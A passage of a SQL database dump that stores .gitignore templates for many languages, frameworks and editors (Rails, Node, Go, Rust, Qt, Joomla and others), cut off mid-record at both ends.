plugin install locations\n/plugins\n/web-app/plugins\n\n# \"temporary\" build files\n/target\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(110,'MetaProgrammingSystem','workspace.xml\njunitvmwatcher*.properties\nbuild.properties\n\n# generated java classes and java source files\n# manually add any custom artifacts that can\'t be generated from the models\n# http://confluence.jetbrains.com/display/MPSD25/HowTo+--+MPS+and+Git\nclasses_gen\nsource_gen\nsource_gen.caches\n\n# generated test code and test results\ntest_gen\ntest_gen.caches\nTEST-*.xml\njunit*.properties\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(111,'Windows','# Windows thumbnail cache files\nThumbs.db\nehthumbs.db\nehthumbs_vista.db\n\n# Dump file\n*.stackdump\n\n# Folder config file\n[Dd]esktop.ini\n\n# Recycle Bin used on file shares\n$RECYCLE.BIN/\n\n# Windows Installer files\n*.cab\n*.msi\n*.msix\n*.msm\n*.msp\n\n# Windows shortcuts\n*.lnk\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(112,'Opa','_build\n_tracks\n\nopa-debug-js\n\n*.opp\n*.opx\n*.opx.broken\n*.dump\n*.api\n*.api-txt\n*.exe\n*.log\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(113,'ExtJs','.architect\nbootstrap.css\nbootstrap.js\nbootstrap.json\nbootstrap.jsonp\nbuild/\nclassic.json\nclassic.jsonp\next/\nmodern.json\nmodern.jsonp\nresources/sass/.sass-cache/\nresources/.arch-internal-preview.css\n.arch-internal-preview.css\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(114,'Processing','.DS_Store\napplet\napplication.linux-arm64\napplication.linux-armv6hf\napplication.linux32\napplication.linux64\napplication.windows32\napplication.windows64\napplication.macosx\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(115,'Rust','# Generated by Cargo\n# will have compiled files and executables\n/target/\n\n# Remove Cargo.lock from gitignore if creating an executable, leave it for libraries\n# More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html\nCargo.lock\n\n# These are backup files generated by rustfmt\n**/*.rs.bk\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(116,'KiCad','# For PCBs designed using KiCad: http://www.kicad-pcb.org/\n# Format documentation: http://kicad-pcb.org/help/file-formats/\n\n# Temporary files\n*.000\n*.bak\n*.bck\n*.kicad_pcb-bak\n*~\n_autosave-*\n*.tmp\n*-rescue.lib\n*-save.pro\n*-save.kicad_pcb\n\n# Netlist files (exported from Eeschema)\n*.net\n\n# Autorouter files (exported from Pcbnew)\n*.dsn\n*.ses\n\n# Exported BOM files\n*.xml\n*.csv\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(117,'Go','# Binaries for programs and plugins\n*.exe\n*.exe~\n*.dll\n*.so\n*.dylib\n\n# Test binary, build with `go test -c`\n*.test\n\n# Output of the go coverage tool, specifically when used with LiteIDE\n*.out\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(118,'SymphonyCMS','manifest/cache/\nmanifest/logs/\nmanifest/tmp/\nsymphony/\nworkspace/uploads/\ninstall-log.txt\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(119,'CommonLisp','*.FASL\n*.fasl\n*.lisp-temp\n*.dfsl\n*.pfsl\n*.d64fsl\n*.p64fsl\n*.lx64fsl\n*.lx32fsl\n*.dx64fsl\n*.dx32fsl\n*.fx64fsl\n*.fx32fsl\n*.sx64fsl\n*.sx32fsl\n*.wx64fsl\n*.wx32fsl\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(120,'Node','# Logs\nlogs\n*.log\nnpm-debug.log*\nyarn-debug.log*\nyarn-error.log*\n\n# Runtime data\npids\n*.pid\n*.seed\n*.pid.lock\n\n# Directory for instrumented libs generated by jscoverage/JSCover\nlib-cov\n\n# Coverage directory used by tools like istanbul\ncoverage\n\n# nyc test coverage\n.nyc_output\n\n# Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files)\n.grunt\n\n# Bower dependency directory (https://bower.io/)\nbower_components\n\n# node-waf configuration\n.lock-wscript\n\n# Compiled binary addons (https://nodejs.org/api/addons.html)\nbuild/Release\n\n# Dependency directories\nnode_modules/\njspm_packages/\n\n# TypeScript v1 declaration files\ntypings/\n\n# Optional npm cache directory\n.npm\n\n# Optional eslint cache\n.eslintcache\n\n# Optional REPL history\n.node_repl_history\n\n# Output of \'npm pack\'\n*.tgz\n\n# Yarn Integrity file\n.yarn-integrity\n\n# dotenv environment variables file\n.env\n\n# parcel-bundler cache (https://parceljs.org/)\n.cache\n\n# next.js build output\n.next\n\n# nuxt.js build output\n.nuxt\n\n# vuepress build output\n.vuepress/dist\n\n# Serverless directories\n.serverless\n\n# FuseBox cache\n.fusebox/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(121,'Coq','.*.aux\n*.a\n*.cma\n*.cmi\n*.cmo\n*.cmx\n*.cmxa\n*.cmxs\n*.glob\n*.ml.d\n*.ml4.d\n*.mli.d\n*.mllib.d\n*.mlpack.d\n*.native\n*.o\n*.v.d\n*.vio\n*.vo\n.coq-native/\n.csdp.cache\n.lia.cache\n.nia.cache\n.nlia.cache\n.nra.cache\ncsdp.cache\nlia.cache\nnia.cache\nnlia.cache\nnra.cache\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(122,'ZendFramework','# Composer files\ncomposer.phar\nvendor/\n\n# Local configs\nconfig/autoload/*.local.php\n\n# Binary gettext files\n*.mo\n\n# Data\ndata/logs/\ndata/cache/\ndata/sessions/\ndata/tmp/\ntemp/\n\n#Doctrine 2\ndata/DoctrineORMModule/Proxy/\ndata/DoctrineORMModule/cache/\n\n# Legacy ZF1\ndemos/\nextras/documentation\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(123,'Ninja','.ninja_deps\n.ninja_log\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(124,'BricxCC','# Bricx Command Center IDE\n# http://bricxcc.sourceforge.net\n*.bak\n*.sym\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(125,'Bazaar','.bzr/\n.bzrignore\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(126,'Nanoc','# For projects using Nanoc (http://nanoc.ws/)\n\n# Default location for output (needs to match output_dir\'s value found in nanoc.yaml)\noutput/\n\n# Temporary file directory\ntmp/nanoc/\n\n# Crash Log\ncrash.log\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(127,'Rails','*.rbc\ncapybara-*.html\n.rspec\n/log\n/tmp\n/db/*.sqlite3\n/db/*.sqlite3-journal\n/public/system\n/coverage/\n/spec/tmp\n*.orig\nrerun.txt\npickle-email-*.html\n\n# TODO Comment out this rule if you are OK with secrets being uploaded to the repo\nconfig/initializers/secret_token.rb\nconfig/master.key\n\n# Only include if you have production secrets in this file, which is no longer a Rails default\n# config/secrets.yml\n\n# dotenv\n# TODO Comment out this rule if environment variables can be committed\n.env\n\n## Environment normalization:\n/.bundle\n/vendor/bundle\n\n# these should all be checked in to normalize the environment:\n# Gemfile.lock, .ruby-version, .ruby-gemset\n\n# unless supporting rvm < 1.11.0 or doing something fancy, ignore this:\n.rvmrc\n\n# if using bower-rails ignore default bower_components path bower.json files\n/vendor/assets/bower_components\n*.bowerrc\nbower.json\n\n# Ignore pow environment settings\n.powenv\n\n# Ignore Byebug command history file.\n.byebug_history\n\n# Ignore node_modules\nnode_modules/\n\n# Ignore precompiled javascript packs\n/public/packs\n/public/packs-test\n/public/assets\n\n# Ignore yarn files\n/yarn-error.log\nyarn-debug.log*\n.yarn-integrity\n\n# Ignore uploaded files in development\n/storage/*\n!/storage/.keep','2020-08-04 08:07:03','2020-08-04 08:07:03'),(128,'NotepadPP','# Notepad++ backups #\r\n*.bak\r\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(129,'ModelSim','# ignore ModelSim generated files and directories (temp files and so on)\n[_@]*\n\n# ignore compilation output of ModelSim\n*.mti\n*.dat\n*.dbs\n*.psm\n*.bak\n*.cmp\n*.jpg\n*.html\n*.bsf\n\n# ignore simulation output of ModelSim\nwlf*\n*.wlf\n*.vstf\n*.ucdb\ncov*/\ntranscript*\nsc_dpiheader.h\nvsim.dbg\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(130,'Redis','# Ignore redis binary dump (dump.rdb) files\n\n*.rdb\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(131,'Jekyll','_site/\n.sass-cache/\n.jekyll-cache/\n.jekyll-metadata\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(132,'KDevelop4','*.kdev4\n.kdev4/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(133,'VisualStudioCode','.vscode/*\n!.vscode/settings.json\n!.vscode/tasks.json\n!.vscode/launch.json\n!.vscode/extensions.json\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(134,'GPG','secring.*\n\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(135,'Fortran','# Prerequisites\n*.d\n\n# Compiled Object files\n*.slo\n*.lo\n*.o\n*.obj\n\n# Precompiled Headers\n*.gch\n*.pch\n\n# Compiled Dynamic libraries\n*.so\n*.dylib\n*.dll\n\n# Fortran module files\n*.mod\n*.smod\n\n# Compiled Static libraries\n*.lai\n*.la\n*.a\n*.lib\n\n# Executables\n*.exe\n*.out\n*.app\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(136,'ChefCookbook','.vagrant\n/cookbooks\n\n# Bundler\nbin/*\n.bundle/*\n\n.kitchen/\n.kitchen.local.yml\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(137,'Dropbox','# Dropbox settings and caches\n.dropbox\n.dropbox.attr\n.dropbox.cache\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(138,'Ensime','# Ensime specific\n.ensime\n.ensime_cache/\n.ensime_lucene/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(139,'Calabash','# Calabash / Cucumber\nrerun/\nreports/\nscreenshots/\nscreenshot*.png\ntest-servers/\n\n# bundler\n.bundle\nvendor\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(140,'Mercury','Mercury/\nMercury.modules\n*.mh\n*.err\n*.init\n*.dll\n*.exe\n*.a\n*.so\n*.dylib\n*.beams\n*.d\n*.c_date\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(141,'Espresso','*.esproj\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(142,'Cloud9','# Cloud9 IDE - http://c9.io\n.c9revisions\n.c9\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(143,'Qt','# C++ objects and libs\n*.slo\n*.lo\n*.o\n*.a\n*.la\n*.lai\n*.so\n*.dll\n*.dylib\n\n# Qt-es\nobject_script.*.Release\nobject_script.*.Debug\n*_plugin_import.cpp\n/.qmake.cache\n/.qmake.stash\n*.pro.user\n*.pro.user.*\n*.qbs.user\n*.qbs.user.*\n*.moc\nmoc_*.cpp\nmoc_*.h\nqrc_*.cpp\nui_*.h\n*.qmlc\n*.jsc\nMakefile*\n*build-*\n\n# Qt unit tests\ntarget_wrapper.*\n\n# QtCreator\n*.autosave\n\n# QtCreator Qml\n*.qmlproject.user\n*.qmlproject.user.*\n\n# QtCreator CMake\nCMakeLists.txt.user*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(144,'Smalltalk','# changes file\n*.changes\n\n# system image\n*.image\n\n# Pharo Smalltalk Debug log file\nPharoDebug.log\n\n# Squeak Smalltalk Debug log file\nSqueakDebug.log\n\n# Monticello package cache\n/package-cache\n\n# playground cache\n/play-cache\n/play-stash\n\n# Metacello-github cache\n/github-cache\ngithub-*.zip\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(145,'Kohana','application/cache/*\napplication/logs/*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(146,'Leiningen','pom.xml\npom.xml.asc\n*.jar\n*.class\n/lib/\n/classes/\n/target/\n/checkouts/\n.lein-deps-sum\n.lein-repl-history\n.lein-plugins/\n.lein-failures\n.nrepl-port\n.cpcache/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(147,'NetBeans','**/nbproject/private/\nbuild/\nnbbuild/\ndist/\nnbdist/\n.nb-gradle/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(148,'FuelPHP','# the composer package lock file and install directory\n# Commit your application\'s lock file http://getcomposer.org/doc/01-basic-usage.md#composer-lock-the-lock-file\n# You may choose to ignore a library lock file http://getcomposer.org/doc/02-libraries.md#lock-file\n# /composer.lock\n/fuel/vendor\n\n# the fuelphp document\n/docs/\n\n# you may install these packages with `oil package`.\n# http://fuelphp.com/docs/packages/oil/package.html\n# /fuel/packages/auth/\n# /fuel/packages/email/\n# /fuel/packages/oil/\n# /fuel/packages/orm/\n# /fuel/packages/parser/\n\n# dynamically generated files\n/fuel/app/logs/*/*/*\n/fuel/app/cache/*/*\n/fuel/app/config/crypt.php\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(149,'Anjuta','# Local configuration folder and symbol database\n/.anjuta/\n/.anjuta_sym_db.db\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(150,'Ada','# Object file\n*.o\n\n# Ada Library Information\n*.ali\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(151,'Yeoman','node_modules/\nbower_components/\n*.log\n\nbuild/\ndist/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(152,'Sdcc','# SDCC stuff\n*.lnk\n*.lst\n*.map\n*.mem\n*.rel\n*.rst\n*.sym\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(153,'CakePHP','# CakePHP 3\n\n/vendor/*\n/config/app.php\n\n/tmp/cache/models/*\n!/tmp/cache/models/empty\n/tmp/cache/persistent/*\n!/tmp/cache/persistent/empty\n/tmp/cache/views/*\n!/tmp/cache/views/empty\n/tmp/sessions/*\n!/tmp/sessions/empty\n/tmp/tests/*\n!/tmp/tests/empty\n\n/logs/*\n!/logs/empty\n\n# CakePHP 2\n\n/app/tmp/*\n/app/Config/core.php\n/app/Config/database.php\n/vendors/*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(154,'Lua','# Compiled Lua sources\nluac.out\n\n# luarocks build files\n*.src.rock\n*.zip\n*.tar.gz\n\n# Object files\n*.o\n*.os\n*.ko\n*.obj\n*.elf\n\n# Precompiled Headers\n*.gch\n*.pch\n\n# Libraries\n*.lib\n*.a\n*.la\n*.lo\n*.def\n*.exp\n\n# Shared objects (inc. Windows DLLs)\n*.dll\n*.so\n*.so.*\n*.dylib\n\n# Executables\n*.exe\n*.out\n*.app\n*.i*86\n*.x86_64\n*.hex\n\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(155,'Lazarus','# Lazarus compiler-generated binaries (safe to delete)\n*.exe\n*.dll\n*.so\n*.dylib\n*.lrs\n*.res\n*.compiled\n*.dbg\n*.ppu\n*.o\n*.or\n*.a\n\n# Lazarus autogenerated files (duplicated info)\n*.rst\n*.rsj\n*.lrt\n\n# Lazarus local files (user-specific info)\n*.lps\n\n# Lazarus backups and unit output folders.\n# These can be changed by user in Lazarus/project options.\nbackup/\n*.bak\nlib/\n\n# Application bundle for Mac OS\n*.app/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(156,'Elixir','/_build\n/cover\n/deps\n/doc\n/.fetch\nerl_crash.dump\n*.ez\n*.beam\n/config/*.secret.exs\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(157,'Joomla','/.htaccess\n/administrator/cache/*\n/administrator/components/com_admin/*\n/administrator/components/com_ajax/*\n/administrator/components/com_tags/*\n/administrator/components/com_banners/*\n/administrator/components/com_cache/*\n/administrator/components/com_postinstall/*\n/administrator/components/com_joomlaupdate/*\n/administrator/components/com_contenthistory/*\n/administrator/components/com_categories/*\n/administrator/components/com_checkin/*\n/administrator/components/com_config/*\n/administrator/components/com_contact/*\n/administrator/components/com_content/*\n/administrator/components/com_cpanel/*\n/administrator/components/com_finder/*\n/administrator/components/com_installer/*\n/administrator/components/com_languages/*\n/administrator/components/com_login/*\n/administrator/components/com_media/*\n/administrator/components/com_menus/*\n/administrator/components/com_messages/*\n/administrator/components/com_modules/*\n/administrator/components/com_newsfeeds/*\n/administrator/components/com_plugins/*\n/administrator/components/com_redirect/*\n/administrator/components/com_search/*\n/administrator/components/com_templates/*\n/administrator/components/com_users/*\n/administrator/help/*\n/administrator/includes/*\n/administrator/language/en-GB/en-GB.com_ajax.ini\n/administrator/language/en-GB/en-GB.com_ajax.sys.ini\n/administrator/language/en-GB/en-GB.com_contenthistory.ini\n/administrator/language/en-GB/en-GB.com_contenthistory.sys.ini\n/administrator/language/en-GB/en-GB.com_joomlaupdate.ini\n/administrator/language/en-GB/en-GB.com_joomlaupdate.sys.ini\n/administrator/language/en-GB/en-GB.com_postinstall.ini\n/administrator/language/en-GB/en-GB.com_postinstall.sys.ini\n/administrator/language/en-GB/en-GB.com_tags.ini\n/administrator/language/en-GB/en-GB.com_tags.sys.ini\n/administrator/language/en-GB/en-GB.mod_stats_admin.ini\n/administrator/language/en-GB/en-GB.mod_stats_admin.sys.ini\n/administrator/language/en-GB/en-GB.plg_authentication_cookie.ini\n/administrator/language/en-GB/en-GB.plg_authentication_cookie.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_contact.ini\n/administrator/language/en-GB/en-GB.plg_content_contact.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_finder.ini\n/administrator/language/en-GB/en-GB.plg_content_finder.sys.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_module*\n/administrator/language/en-GB/en-GB.plg_finder_categories.ini\n/administrator/language/en-GB/en-GB.plg_finder_categories.sys.ini\n/administrator/language/en-GB/en-GB.plg_finder_contacts.ini\n/administrator/language/en-GB/en-GB.plg_finder_contacts.sys.ini\n/administrator/language/en-GB/en-GB.plg_finder_content.ini\n/administrator/language/en-GB/en-GB.plg_finder_content.sys.ini\n/administrator/language/en-GB/en-GB.plg_finder_newsfeeds.sys.ini\n/administrator/language/en-GB/en-GB.plg_finder_newsfeeds.ini\n/administrator/language/en-GB/en-GB.plg_finder_tags.ini\n/administrator/language/en-GB/en-GB.plg_finder_tags.sys.ini\n/administrator/language/en-GB/en-GB.plg_finder_weblinks.ini\n/administrator/language/en-GB/en-GB.plg_finder_weblinks.sys.ini\n/administrator/language/en-GB/en-GB.plg_installer_folderinstaller*\n/administrator/language/en-GB/en-GB.plg_installer_packageinstaller*\n/administrator/language/en-GB/en-GB.plg_installer_packageinstaller\n/administrator/language/en-GB/en-GB.plg_installer_urlinstaller*\n/administrator/language/en-GB/en-GB.plg_installer_webinstaller.ini\n/administrator/language/en-GB/en-GB.plg_installer_webinstaller.sys.ini\n/administrator/language/en-GB/en-GB.plg_quickicon_joomlaupdate.ini\n/administrator/language/en-GB/en-GB.plg_quickicon_joomlaupdate.sys.ini\n/administrator/language/en-GB/en-GB.plg_search_tags.ini\n/administrator/language/en-GB/en-GB.plg_search_tags.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_languagecode.ini\n/administrator/language/en-GB/en-GB.plg_system_languagecode.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_stats*\n/administrator/language/en-GB/en-GB.plg_system_updatenotification*\n/administrator/language/en-GB/en-GB.plg_twofactorauth_totp.ini\n/administrator/language/en-GB/en-GB.plg_twofactorauth_totp.sys.ini\n/administrator/language/en-GB/en-GB.plg_twofactorauth_yubikey.ini\n/administrator/language/en-GB/en-GB.plg_twofactorauth_yubikey.sys.ini\n/administrator/language/en-GB/en-GB.tpl_isis.ini\n/administrator/language/en-GB/en-GB.tpl_isis.sys.ini\n/administrator/language/en-GB/install.xml\n/administrator/language/en-GB/en-GB.com_admin.ini\n/administrator/language/en-GB/en-GB.com_admin.sys.ini\n/administrator/language/en-GB/en-GB.com_banners.ini\n/administrator/language/en-GB/en-GB.com_banners.sys.ini\n/administrator/language/en-GB/en-GB.com_cache.ini\n/administrator/language/en-GB/en-GB.com_cache.sys.ini\n/administrator/language/en-GB/en-GB.com_categories.ini\n/administrator/language/en-GB/en-GB.com_categories.sys.ini\n/administrator/language/en-GB/en-GB.com_checkin.ini\n/administrator/language/en-GB/en-GB.com_checkin.sys.ini\n/administrator/language/en-GB/en-GB.com_config.ini\n/administrator/language/en-GB/en-GB.com_config.sys.ini\n/administrator/language/en-GB/en-GB.com_contact.ini\n/administrator/language/en-GB/en-GB.com_contact.sys.ini\n/administrator/language/en-GB/en-GB.com_content.ini\n/administrator/language/en-GB/en-GB.com_content.sys.ini\n/administrator/language/en-GB/en-GB.com_cpanel.ini\n/administrator/language/en-GB/en-GB.com_cpanel.sys.ini\n/administrator/language/en-GB/en-GB.com_finder.ini\n/administrator/language/en-GB/en-GB.com_finder.sys.ini\n/administrator/language/en-GB/en-GB.com_installer.ini\n/administrator/language/en-GB/en-GB.com_installer.sys.ini\n/administrator/language/en-GB/en-GB.com_languages.ini\n/administrator/language/en-GB/en-GB.com_languages.sys.ini\n/administrator/language/en-GB/en-GB.com_login.ini\n/administrator/language/en-GB/en-GB.com_login.sys.ini\n/administrator/language/en-GB/en-GB.com_mailto.sys.ini\n/administrator/language/en-GB/en-GB.com_media.ini\n/administrator/language/en-GB/en-GB.com_media.sys.ini\n/administrator/language/en-GB/en-GB.com_menus.ini\n/administrator/language/en-GB/en-GB.com_menus.sys.ini\n/administrator/language/en-GB/en-GB.com_messages.ini\n/administrator/language/en-GB/en-GB.com_messages.sys.ini\n/administrator/language/en-GB/en-GB.com_modules.ini\n/administrator/language/en-GB/en-GB.com_modules.sys.ini\n/administrator/language/en-GB/en-GB.com_newsfeeds.ini\n/administrator/language/en-GB/en-GB.com_newsfeeds.sys.ini\n/administrator/language/en-GB/en-GB.com_plugins.ini\n/administrator/language/en-GB/en-GB.com_plugins.sys.ini\n/administrator/language/en-GB/en-GB.com_redirect.ini\n/administrator/language/en-GB/en-GB.com_redirect.sys.ini\n/administrator/language/en-GB/en-GB.com_search.ini\n/administrator/language/en-GB/en-GB.com_search.sys.ini\n/administrator/language/en-GB/en-GB.com_templates.ini\n/administrator/language/en-GB/en-GB.com_templates.sys.ini\n/administrator/language/en-GB/en-GB.com_users.ini\n/administrator/language/en-GB/en-GB.com_users.sys.ini\n/administrator/language/en-GB/en-GB.com_weblinks.ini\n/administrator/language/en-GB/en-GB.com_weblinks.sys.ini\n/administrator/language/en-GB/en-GB.com_wrapper.ini\n/administrator/language/en-GB/en-GB.com_wrapper.sys.ini\n/administrator/language/en-GB/en-GB.ini\n/administrator/language/en-GB/en-GB.lib_joomla.ini\n/administrator/language/en-GB/en-GB.localise.php\n/administrator/language/en-GB/en-GB.mod_custom.ini\n/administrator/language/en-GB/en-GB.mod_custom.sys.ini\n/administrator/language/en-GB/en-GB.mod_feed.ini\n/administrator/language/en-GB/en-GB.mod_feed.sys.ini\n/administrator/language/en-GB/en-GB.mod_latest.ini\n/administrator/language/en-GB/en-GB.mod_latest.sys.ini\n/administrator/language/en-GB/en-GB.mod_logged.ini\n/administrator/language/en-GB/en-GB.mod_logged.sys.ini\n/administrator/language/en-GB/en-GB.mod_login.ini\n/administrator/language/en-GB/en-GB.mod_login.sys.ini\n/administrator/language/en-GB/en-GB.mod_menu.ini\n/administrator/language/en-GB/en-GB.mod_menu.sys.ini\n/administrator/language/en-GB/en-GB.mod_multilangstatus.ini\n/administrator/language/en-GB/en-GB.mod_multilangstatus.sys.ini\n/administrator/language/en-GB/en-GB.mod_online.ini\n/administrator/language/en-GB/en-GB.mod_online.sys.ini\n/administrator/language/en-GB/en-GB.mod_popular.ini\n/administrator/language/en-GB/en-GB.mod_popular.sys.ini\n/administrator/language/en-GB/en-GB.mod_quickicon.ini\n/administrator/language/en-GB/en-GB.mod_quickicon.sys.ini\n/administrator/language/en-GB/en-GB.mod_status.ini\n/administrator/language/en-GB/en-GB.mod_status.sys.ini\n/administrator/language/en-GB/en-GB.mod_submenu.ini\n/administrator/language/en-GB/en-GB.mod_submenu.sys.ini\n/administrator/language/en-GB/en-GB.mod_title.ini\n/administrator/language/en-GB/en-GB.mod_title.sys.ini\n/administrator/language/en-GB/en-GB.mod_toolbar.ini\n/administrator/language/en-GB/en-GB.mod_toolbar.sys.ini\n/administrator/language/en-GB/en-GB.mod_unread.ini\n/administrator/language/en-GB/en-GB.mod_unread.sys.ini\n/administrator/language/en-GB/en-GB.mod_version.ini\n/administrator/language/en-GB/en-GB.mod_version.sys.ini\n/administrator/language/en-GB/en-GB.plg_authentication_example.ini\n/administrator/language/en-GB/en-GB.plg_authentication_example.sys.ini\n/administrator/language/en-GB/en-GB.plg_authentication_gmail.ini\n/administrator/language/en-GB/en-GB.plg_authentication_gmail.sys.ini\n/administrator/language/en-GB/en-GB.plg_authentication_joomla.ini\n/administrator/language/en-GB/en-GB.plg_authentication_joomla.sys.ini\n/administrator/language/en-GB/en-GB.plg_authentication_ldap.ini\n/administrator/language/en-GB/en-GB.plg_authentication_ldap.sys.ini\n/administrator/language/en-GB/en-GB.plg_captcha_recaptcha.ini\n/administrator/language/en-GB/en-GB.plg_captcha_recaptcha.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_emailcloak.ini\n/administrator/language/en-GB/en-GB.plg_content_emailcloak.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_geshi.ini\n/administrator/language/en-GB/en-GB.plg_content_geshi.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_joomla.ini\n/administrator/language/en-GB/en-GB.plg_content_joomla.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_loadmodule.ini\n/administrator/language/en-GB/en-GB.plg_content_loadmodule.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_pagebreak.ini\n/administrator/language/en-GB/en-GB.plg_content_pagebreak.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_pagenavigation.ini\n/administrator/language/en-GB/en-GB.plg_content_pagenavigation.sys.ini\n/administrator/language/en-GB/en-GB.plg_content_vote.ini\n/administrator/language/en-GB/en-GB.plg_content_vote.sys.ini\n/administrator/language/en-GB/en-GB.plg_editors_codemirror.ini\n/administrator/language/en-GB/en-GB.plg_editors_codemirror.sys.ini\n/administrator/language/en-GB/en-GB.plg_editors_none.ini\n/administrator/language/en-GB/en-GB.plg_editors_none.sys.ini\n/administrator/language/en-GB/en-GB.plg_editors_tinymce.ini\n/administrator/language/en-GB/en-GB.plg_editors_tinymce.sys.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_article.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_article.sys.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_image.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_image.sys.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_pagebreak.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_pagebreak.sys.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_readmore.ini\n/administrator/language/en-GB/en-GB.plg_editors-xtd_readmore.sys.ini\n/administrator/language/en-GB/en-GB.plg_extension_joomla.ini\n/administrator/language/en-GB/en-GB.plg_extension_joomla.sys.ini\n/administrator/language/en-GB/en-GB.plg_quickicon_extensionupdate.ini\n/administrator/language/en-GB/en-GB.plg_quickicon_extensionupdate.sys.ini\n/administrator/language/en-GB/en-GB.plg_search_categories.ini\n/administrator/language/en-GB/en-GB.plg_search_categories.sys.ini\n/administrator/language/en-GB/en-GB.plg_search_contacts.ini\n/administrator/language/en-GB/en-GB.plg_search_contacts.sys.ini\n/administrator/language/en-GB/en-GB.plg_search_content.ini\n/administrator/language/en-GB/en-GB.plg_search_content.sys.ini\n/administrator/language/en-GB/en-GB.plg_search_newsfeeds.ini\n/administrator/language/en-GB/en-GB.plg_search_newsfeeds.sys.ini\n/administrator/language/en-GB/en-GB.plg_search_weblinks.ini\n/administrator/language/en-GB/en-GB.plg_search_weblinks.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_cache.ini\n/administrator/language/en-GB/en-GB.plg_system_cache.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_debug.ini\n/administrator/language/en-GB/en-GB.plg_system_debug.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_highlight.ini\n/administrator/language/en-GB/en-GB.plg_system_highlight.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_languagefilter.ini\n/administrator/language/en-GB/en-GB.plg_system_languagefilter.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_log.ini\n/administrator/language/en-GB/en-GB.plg_system_logout.ini\n/administrator/language/en-GB/en-GB.plg_system_logout.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_log.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_p3p.ini\n/administrator/language/en-GB/en-GB.plg_system_p3p.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_redirect.ini\n/administrator/language/en-GB/en-GB.plg_system_redirect.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_remember.ini\n/administrator/language/en-GB/en-GB.plg_system_remember.sys.ini\n/administrator/language/en-GB/en-GB.plg_system_sef.ini\n/administrator/language/en-GB/en-GB.plg_system_sef.sys.ini\n/administrator/language/en-GB/en-GB.plg_user_contactcreator.ini\n/administrator/language/en-GB/en-GB.plg_user_contactcreator.sys.ini\n/administrator/language/en-GB/en-GB.plg_user_joomla.ini\n/administrator/language/en-GB/en-GB.plg_user_joomla.sys.ini\n/administrator/language/en-GB/en-GB.plg_user_profile.ini\n/administrator/language/en-GB/en-GB.plg_user_profile.sys.ini\n/administrator/language/en-GB/en-GB.tpl_hathor.ini\n/administrator/language/en-GB/en-GB.tpl_hathor.sys.ini\n/administrator/language/en-GB/en-GB.xml\n/administrator/language/overrides/*\n/administrator/logs/*\n/administrator/manifests/*\n/administrator/modules/mod_custom/*\n/administrator/modules/mod_feed/*\n/administrator/modules/mod_l